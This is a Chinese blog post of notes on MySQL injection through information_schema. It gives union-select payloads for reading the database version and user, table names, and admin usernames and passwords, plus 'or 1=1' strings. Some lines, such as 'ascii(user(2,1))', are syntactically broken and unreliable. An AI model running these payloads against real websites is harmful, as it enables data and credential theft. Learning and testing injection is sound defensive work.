MYSQL報錯注入雜記

原創 gam0n 2020-02-22 01:33

元數據庫information_schema

在5.0以後版本的MYSQL中存在着一個元數據information_schema,其中存儲着用戶在MYSQL中創建的所有其他數據庫的信息。

當對PHP+MYSQL類網站進行注入時,主要是針對information_schema數據庫進行操作;

 

比較重要的數據表:

schema:用於存放所有數據庫的名字;

tables:用於存放所有數據庫中的數據表的名字;

columns:用於存放所有數據庫的所有數據表中的所有字段的名字;

eg.

查看數據庫cms0308數據庫中包含了那些表:

select table_name from information_schema.tables where table_schema = "cms0308";

查看hack數據表中包含了哪些字段:

select column_name from information_schema.columns where table_name="hack";

 

 

通過加上1=2用於造成前面的語句錯誤,只顯示後面select1,2的內容:

select * from hack where id=1 and 1=2 union select 1,2

若沒有加上1=2,上述語句將只返回前面正確內容。

 

查看當前版本號,當前用戶:

select * from hack where id=1 and 1=2 union select 1,version(),user(),4,5

查看當前數據庫:

select * from hack where id=1 and 1=1 union select 1,database(),3,4,5

 

通過group_concat()顯示字段中所有內容:

union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema="govcn"

 

利用unhex(hex())函數進行編碼轉換,解決網站編碼不一致導致的問題:

union select 1,unhex(hex(username)),unhex(hex(password)),4,5 from admin

 

‘+or+’1’=’1

‘+or+ascii(user(2,1))=2+or+’1’=’1         (2,代表第二個字母,1代表第一個表名)

判斷sql語句用什麼連接,用+號連接的是sqlserver,用||連接的是oracle,用空格的是mysql

 

 

 

 

gam0n
發佈了37 篇原創文章 · 獲贊 0 · 訪問量 6250
私信 關注
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

內網滲透(上)

每日一句: 做安全,有一定實力的話。找工作,待遇不好就不要去,不要委屈求全。 世界上好地方那麼多,不出去看看的話,你就以爲這就是世界 另外,二進制其實也不是多值錢的玩意,沒必要覺得多深奧 聲明: 內網滲透

划水的小白白 2020-07-08 00:37:05

隱藏在圖片裏的後門

一、前言 本文原創作者:sucppVK,本文屬i春秋原創獎勵計劃,未經許可禁止轉載! 先說明三點:   這個後門就是一句話木馬這個不同於我們常說的圖片馬這個後門是過安全狗的 這個不算什麼新姿勢,只不過被提到的次數比較少 (各大論壇常見的

i春秋论坛 2020-07-07 05:14:23

PHP 限制訪問ip白名單

摘要: web系統經常會做到只允許內部服務器交互的情況,比如我的swoole機器與web機器交互.爲了安全,也爲了方便,我沒有做加密傳輸,而是簡單的做了ip白名單限制   一  上代碼   config.php //ip白名單配

布叔喂丶 2020-07-06 11:17:09

web安全之跨站腳本攻擊XSS與防範方法

跨站腳本攻擊(Cross Site Script爲了區別於CSS簡稱爲XSS)指的是惡意攻擊者往Web頁面裏插入惡意html代碼,當用戶瀏覽該頁之時,嵌入其中Web裏面的html代碼會被執行,從而達到惡意用戶的特殊目的。 一個簡單的留

Mark_Melon 2020-07-06 10:29:04

內網滲透 -- 獲取內網中其他主機權限

  每天早上醒來你有兩個選擇:一是蓋上被子繼續做你沒做完的夢,二是掀開被子去完成你未完成的夢。。。 ----  網易雲熱評 環境:小攻:Kali 2020,ip:192.168.1.133           小受:win7 x86,ip

web安全工具库 2020-07-05 13:24:00

web安全系列之環境準備

web安全系列之環境準備準備環境安裝kali linux 2.0安裝centos 7安裝mysql安裝 java安裝 Apache Tomcat安裝PHP安裝 Nginx安裝 DVWA 準備環境 攻擊攻擊機kali linux 2

enjoy5512 2020-07-05 03:37:20

被動信息收集:使用OSINT框架進行信息收集

開源網絡情報(OSINT)庫,它是指可以合法地從有關個人或組織的免費公共來源中收集的任何信息。我一般簡單理解爲,就是被動信息收集。 被動收集的好處 與目標系統不產生直接交互 儘量避免留下痕跡 被動收集的難點 被動信息收集的難點

尸者狗 2020-07-04 06:50:48

寬字節注入1

寬字節注入原理 GBK 佔用兩字節,即一個符號佔用兩個字節 ASCII佔用一字節 PHP中編碼爲GBK,函數執行添加的是ASCII編碼(添加的符號爲“\”),MYSQL默認字符集是GBK等寬字節字符集。 大家都知道%df’ 被PH

啊哈哈哈765 2020-07-07 22:32:51

寬字節注入2

注入基礎 之前我們在1中講了使用%df 但是沒必要總是使用%df 可以使用其他的 注入代碼分析 下圖第一個函數是替換單引號和雙引號 即將單引號前加斜槓 雙引號前加斜槓 函數功能其實和本身自帶函數功能一樣 記住 寬字節注入mysq

啊哈哈哈765 2020-07-07 22:32:51

i春秋2020新春公益賽 GYCTF有關SQL注入題復現

0x00 前言 最近這段時間參加過一些CTF在線競賽,做過一些Web題,發現SQL注入漏洞出現的頻率可真高!不過在做題中也get到了一些Web新知識,現在通過題目復現的方式總結一下。 0x01 blacklist 考點:堆疊注入+

Qwzf 2020-07-07 18:04:49

PHP魔法函數之magic_quotes_gpc

magic_quotes_gpc 魔法函數存在於PHP 5.3.4及以下版本,作用是對POST、GET、Cookie傳入的數據進行轉義處理,在輸入數據的特殊字符如 單引號(')、雙引號(")、反斜線(\)與 NULL(NULL 字

工科学生死板板 2020-07-06 15:38:15

WEB程序防SQL注入攻擊程序

場景: WEB程序容易被SQL注入攻擊,攻擊原理是在請求參數中傳入非法字符,造成SQL語句出現出現異常情況,已達到攻擊者想要的結果。 分析: 一般的攻擊者都是在傳入的請求參數上做文章,所以我們重點檢查的是request的參數,判斷requ

成都好男人 2020-07-06 07:55:56

淺談SQL注入(入門版)

淺談SQL注入 (篇幅較長,包含對SQL注入的分析) 目錄 一、SQL注入原理 二、SQL注入的探測語句 三、SQL注入的進一步注入 一、SQL注入的原理 解釋型語言:程序不需要編譯,程序在運行時才翻譯成機器語言,每執行

羽路星尘 2020-07-05 06:34:35

Java Web項目解決 sql 注入問題(過濾器進行過濾解決)

** 1、編寫過濾器類—SqlFilter.java ** package com.yl.zp.controller; import java.io.IOException; import java.util.Enumerat

HelloWord_Object 2020-07-04 14:45:27

SQL注入的方式與防治

 所謂的SQL注入、XSS、溢出等的漏洞,歸根到底,就是代碼注入的問題,導致代碼注入漏洞的產生的原因是因爲代碼和數據沒有分離,即程序所處理的數據和程序的代碼混在了一起,沒有明確的區分。。。$oM>?h_ =  ok:L]8UN 3

cduter 2020-07-04 09:33:01